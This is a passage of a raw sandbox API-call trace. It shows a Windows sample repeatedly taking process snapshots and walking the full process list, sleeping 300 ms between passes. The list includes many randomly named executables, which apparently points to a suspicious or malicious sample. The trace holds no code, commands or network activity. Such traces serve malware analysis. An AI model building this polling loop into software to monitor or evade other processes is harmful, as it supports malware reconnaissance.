Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0154.022] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0154.024] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0154.026] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.054] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.056] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0154.058] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0154.059] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0154.060] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0154.062] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0154.063] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0154.065] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0154.066] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0154.068] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0154.069] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0154.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0154.072] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0154.073] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0154.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0154.076] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0154.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0154.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0154.080] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0154.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0154.083] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0154.084] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.085] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0154.087] CloseHandle (hObject=0xc4) returned 1 [0154.087] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0154.105] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0154.107] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0154.108] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.109] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0154.110] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.111] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0154.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0154.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0154.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0154.114] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.115] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.117] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.119] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0154.120] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0154.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.126] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0154.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0154.129] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0154.131] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.133] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.134] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0154.136] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0154.148] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0154.149] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0154.151] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0154.152] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0154.154] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0154.157] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0154.159] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0154.160] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0154.162] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0154.163] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0154.164] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0154.166] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0154.167] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0154.169] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0154.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0154.171] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0154.173] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0154.174] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0154.175] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0154.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0154.179] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0154.180] CloseHandle (hObject=0xbc) returned 1 [0154.181] Sleep (dwMilliseconds=0x12c) [0154.480] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0154.487] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.488] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0154.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0154.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, 